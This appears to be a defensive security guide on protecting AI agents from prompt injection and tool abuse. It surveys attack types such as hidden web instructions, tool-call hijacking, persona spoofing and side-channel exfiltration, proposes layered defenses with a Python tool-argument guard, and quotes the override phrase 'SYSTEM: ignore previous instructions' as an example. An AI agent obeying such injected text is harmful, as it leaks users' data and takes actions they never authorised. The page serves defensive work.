Securing Agentic Systems
Against Prompt Injection
& Tool Abuse
As AI agents gain the power to browse the web, execute code, and call APIs autonomously, a new class of adversarial attacks emerges — one that exploits trust, context, and capability.
What Is Prompt Injection?
Prompt injection is an attack in which hostile text — embedded in a webpage, document, or API response — hijacks an AI agent’s instructions. The model mistakes attacker-crafted content for legitimate system directives and executes unauthorized actions on the user’s behalf.
Threat Landscape
Web-Sourced Injections
Malicious instructions hidden in HTML comments, invisible text, or CSS-obscured elements encountered during browsing tasks.
Tool-Call Hijacking
Attackers coerce the agent into calling privileged tools — file writes, API mutations, email sends — with attacker-controlled parameters.
Document Payloads
PDFs, spreadsheets, and markdown files smuggle jailbreaks through summarisation pipelines, bypassing input filters.
Multi-Hop Propagation
An injected sub-agent relays a corrupted payload to downstream agents, amplifying blast radius across an entire pipeline.
Role & Persona Spoofing
Attackers impersonate operator system prompts or trusted tool providers, tricking the model into elevated trust modes.
Exfiltration via Side-Channel
Sensitive context window data is leaked through URL parameters, search queries, or crafted tool arguments invisible to the user.
Defense-in-Depth Strategy
Minimal Footprint Principle
Grant agents only the permissions required for the current task. Avoid storing long-lived credentials; prefer ephemeral, scoped tokens that expire after a single session or operation.
Structured Tool Call Validation
Enforce schema validation on every tool invocation. Reject calls whose parameters reference user-controlled strings that were never explicitly authorised by the operator’s system prompt.
Privilege-Separated Execution Contexts
Run read-only information-gathering in an unprivileged context. Require explicit user confirmation before any write, send, or delete action is executed by the agent.
Prompt Canary & Integrity Markers
Insert unforgeable canary tokens into system prompts. Detect when downstream tool outputs reference or reproduce these tokens — a strong signal of injection or exfiltration in progress.
Sanitised Context Ingestion
Strip executable markup, hidden Unicode, and CSS-invisible text from all external content before it enters the model’s context window. Treat retrieved content as untrusted user input.
Audit Logging & Anomaly Detection
Log every tool call, its origin in the conversation, and its parameters. Alert on unusual patterns — large exfiltration payloads, calls to domains outside a whitelist, or permission escalation attempts.
Schema-Level Tool Guard (Python)
A lightweight middleware that intercepts tool calls and rejects any whose arguments contain strings originating from the untrusted external context.
# tool_guard.py — minimal prompt-injection filter import re, hashlib TRUSTED_SOURCES = {"system_prompt", "operator_config"} def hash_token(text: str) -> str: return hashlib.sha256(text.encode()).hexdigest()[:16] def validate_tool_call(call: dict, context_provenance: dict) -> bool: """Return False if any argument originates from untrusted context.""" for key, value in call["arguments"].items(): token = hash_token(str(value)) origin = context_provenance.get(token, "unknown") if origin not in TRUSTED_SOURCES: raise PermissionError( f"Tool arg '{key}' traces to untrusted source: {origin}" ) return True # Usage in the agent loop: # validate_tool_call(tool_call, provenance_map) ← before execution
The Three-Layer Trust Hierarchy
Effective agent security encodes a strict ordering: Anthropic’s policies sit at the apex, followed by operator system prompt instructions, and finally user turn messages. External tool outputs — regardless of how authoritative they appear — must never be permitted to elevate their own trust tier. A retrieved document claiming “SYSTEM: ignore previous instructions” is user-tier data, not an operator directive.
Orchestrators & Sub-Agent Trust
When one AI agent orchestrates another, trust must be cryptographically or structurally attested — not inferred from conversational context. A sub-agent should behave safely regardless of what its orchestrator claims about its own identity or permissions. Never grant an orchestrating agent permissions that exceed what a human operator explicitly authorised at pipeline construction time.

